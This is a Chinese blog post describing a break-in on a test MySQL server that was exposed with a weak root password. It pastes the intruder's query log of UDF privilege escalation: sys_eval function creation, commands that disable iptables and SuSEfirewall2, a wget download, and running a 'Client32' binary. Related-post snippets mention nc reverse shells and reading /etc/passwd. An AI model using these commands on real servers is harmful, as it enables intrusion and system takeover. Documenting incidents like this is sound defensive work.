mysql udf安全_mysql中UDF引入的安全问题

最新推荐文章于 2021-02-17 20:10:26 发布
最新推荐文章于 2021-02-17 20:10:26 发布
阅读量141 收藏
点赞数
文章标签: mysql udf安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34790081/article/details/113594538
版权

一个测试库,由于之前部署的时候没注意它有公网地址,因此密码也设得比较简单,直接把root密码设为123456,没想到很快就被扫描后登进去了,还建了一个用户,试图利用mysql udf取得机器系统权限。如下:

108883 Query    CREATE FUNCTION sys_eval RETURNS string SONAME'mysqludf.so'

108883 Query    CREATE FUNCTION sys_eval RETURNS string SONAME'mysqludf64.so'

108883 Query    CREATE FUNCTION sys_eval RETURNS string SONAME'lib_mysqludf.so'

108883 Query    CREATE FUNCTION sys_eval RETURNS string SONAME'udf.so'

108883 Query    CREATE FUNCTION sys_eval RETURNS string SONAME'xiaoji64.so'

108883 Query    CREATE FUNCTION sys_eval RETURNS string SONAME'xiaoji.so'

108883 Query    CREATE FUNCTION sys_eval RETURNS string SONAME'liunx32.so'

108883 Query    CREATE FUNCTION sys_evalRETURNS string SONAME 'liunx64.so'

108883 Query    create function sys_eval returns string soname"lib_mysqludf_sys.so"

108883 Query    CREATE FUNCTION mylab_sys_exec RETURNS INTEGERSONAME "mylab_sys_exec.so"

108883 Query    system chmod +x Client32

108883 Query    system chmod 777 Client32

system ./Client32

108883 Query    select sys_eval("/etc/init.d/iptablesstop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget-c

108883 Query    SELECT mylab_sys_exec(/etc/init.d/iptables stop

108883 Query    service iptables stop

108883 Query    SuSEfirewall2 stop

108883 Query    reSuSEfirewall2 stop

151208 10:09:40108883 Query    chmod 777 Client32

108883 Query    ./Client32

108883 Query    ");

关于UDF提权是咋回事,这里不细说了。

苏试试
关注
mysql udf安全_MySQL数据库UDF安全问题利用
weixin_31119637的博客
01-21 166
查看下这个udf库所支持的函数创建函数并且查看是否创建成功,可以看到一个名叫sys_eval的UDF创建成功了。最后利用UDF执行更高权限的功能剩下的就用这个UDF获得系统权限吧,提示可以用nc反弹,在自己的主机上执行nc -vv -l -p 12345,在数据库上执行一下sql语句就可以成功反弹出linux shell了,再往下就。不过UDF的利用也有局限性,需要有MySQL库的操作权限,在my...
mysql udf禁用_Mysql数据库提权:浅谈UDF安全问题利用
weixin_42157567的博客
01-18 181
一直比较关注服务器安全问题,最近和一个朋友探讨mysql的利用UDF提权问题。我们攻陷一个网站的时候拿到root密码,有时候不仅仅看看数据库,还可以做其他事情,甚至服务器提权哦。譬如, 执行一条sql语句查看/etc/passwd文件的内容:这里主要是用到了load_file()函数,当然这个函数是可以被禁用的。以上可以轻松看到/etc/passwd文件的信息和ip地址,当然其他的文件内容都可以被...
mysql udf安全_mysql数据库udf提权
weixin_39607935的博客
02-17 139
mysql数据库udf提权UDF (user defined function),即用户自定义函数。通过添加新函数,对MySQL数据库的功能进行扩充,就像使用本地MySQL函数如 database() 或 version() 一样。mysql数据库udf提权步骤1. 在mysql>5.1版本,udf.dll应放置在mysql安装目录的lib\plugin下。在mysql<5.1版本,u...
MySQL:数据库变动时使用mysql-http-udf实时更新前台
OceanStar的博客
01-23 2245
文章目录1、下载2、解压3、添加环境变量:4、配置MYSQL5、安装并启动MYSQL服务器6、登陆并设置初始密码 1、下载 地址:https://dev.mysql.com/downloads/mysql/ 2、解压 本人解压路径为:E:\software\mysql-8.0.14-winx64 3、添加环境变量: 添加: 键名:MYSQL_HOME 值为:E:\software\mysq...
MYSQL_UDF-5.0.rar_mysql udf_udf_udf mysql
09-23
不过,使用UDF时也需注意性能和安全性,避免引入不必要的复杂性和潜在风险。 总的来说,"MYSQL_UDF-5.0.rar"是一个包含MySQL 5.0版用户自定义函数开发资源的压缩包,通过学习和应用其的内容,可以深入了解和实践...
lib_mysqludf_sys
12-22
这时,"lib_mysqludf_sys"应运而生,它是一套用于MySQL的系统命令用户定义函数(UDF),可以让我们在MySQL查询直接调用系统命令。 "lib_mysqludf_sys"是由第三方开发者提供的扩展库,主要目标是为MySQL提供与操作...
lib_mysqludf_sys 的win版本dll库
12-01
这意味着用户需要将此DLL文件正确地安装到Windows系统的MySQL服务器,以便在查询使用lib_mysqludf_sys提供的功能。 **压缩包子文件的文件名称列表** - **DLL工具.exe**: 这很可能是一个实用工具,用于帮助用户...
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
CentOS 7.5 64下编译好的lib_mysqludf_sys.so
10-12
CentOS 7.5 64位下编译好的lib_mysqludf_sys.so,源文件在https://download.csdn.net/download/shaynerain/10715798,我博客 有介绍怎么用
Mysql udf提权(Linux平台)
热门推荐
3569
12-17 2万+
http://vinc.top/2017/04/19/mysql-udf%E6%8F%90%E6%9D%83linux%E5%B9%B3%E5%8F%B0/ UDFMySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限 网上有些文章利用的是sqlmap-master\udf\mysq
安装py2neo库
qq_42404495的博客
07-30 1万+
使用Python调用neo4j,安装py2neo库 首先要安装py2neo库 首先要安装python环境,我安装的是python2其次检查类似D:\python\Scripts这个文件夹里是否有easy_install,如有进行下一步。 检查python文件夹里也在scripts里是否有pip,它相当于python安装第三方库的工具。 cmd打开文件夹cd /d D:\python\Scripts 表示我已经有pip这个安装工具了,就可以下载py2neo库了 可用pip install sklearn直
mysqlUDF引入安全问题
weixin_34245749的博客
04-07 248
一个测试库,由于之前部署的时候没注意它有公网地址,因此密码也设得比较简单,直接把root密码设为123456,没想到很快就被扫描后登进去了,还建了一个用户,试图利用mysql udf取得机器系统权限。如下:108883 Connect root@222.186.30.126on108883 Query CRE...
<Zhuuu_ZZ>HIVE(十一)函数
Zhuuu_ZZ的博客
09-22 2550
Hive内置函数一 Hive函数分类二 字符函数二 类型转换函数和数学函数三 日期函数四 集合函数五 条件函数六 聚合函数和表生成函数6.1 聚合函数6.2 表生成函数:输出可以作为表使用 一 Hive函数分类 从输入输出角度分类 标准函数:一行数据的一列或多列为输入,结果为单一值 聚合函数:多行的零列到多列为输入,结果为单一值 表生成函数:零个或多个输入,结果为多列或多行 从实现方式分类 内置函数 自定义函数 UDF:自定义标准函数 UDAF:自定义聚合函数 UDTF:自定义表生成函数
RedHat Enterprise Linux 7关闭防火墙方法 在之前的版本关闭防火墙等服务的命令是 service iptables stop /etc/init.d/iptables st
taotaoyangc的博客
12-23 2197
RedHat Enterprise Linux 7关闭防火墙方法 在之前的版本关闭防火墙等服务的命令是 service iptables stop /etc/init.d/iptables stop   在RHEL7,其实没有这个服务 [root@rhel7 ~]# cat /etc/redhat-release  Red Hat Enterprise
Mysql数据库UDF安全问题利用
weixin_33895016的博客
10-06 285
最近一直在休假,没有写博客,转眼十一还剩最后一天,时间真的很快。今天想谈谈数据库的安全问题。 对于数据库的安全问题,首先,重要的生成库千万不能放在公网上,一旦被******后果不堪设想,轻则数据丢失,重则被***(整库被打包导出),如果恰恰又以明文存储了用户的密码,那么就太可怕了,去年轰动一时的某几个大型网站的用户数据泄漏事件都是因为明文的方式存储了用户的密码。其次是大量的数据库弱口令问题存在...
重磅-记一次惊心动魄的阿里云服务器被入侵过程定位
yinn
09-30 1万+
现象 某天登陆自己的阿里云服务器,发现有很多命名奇怪的进程:  定位步骤一:查看进程文件位置 通过命令 ll /proc/pid 查看进程文件exe执行路径,打开后整个人都惊呆了!mysql目录和mysql/data目录多了很多奇怪的so文件和可执行文件: 定位步骤二:立马kill掉进程和文件 批量kill进程:介绍一个在stackoverfl
LINUX下防火墙状态查看,关闭等
u010297717的博客
01-18 1049
查看防火墙状态: /etc/init.d/iptables status 暂时关闭防火墙: /etc/init.d/iptables stop 禁止防火墙在系统启动时启动 /sbin/chkconfig --level 2345 iptables off 重启iptables: /etc/init.d/iptables restart 题外话: BT或者骡子速度慢用不着关防火墙,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值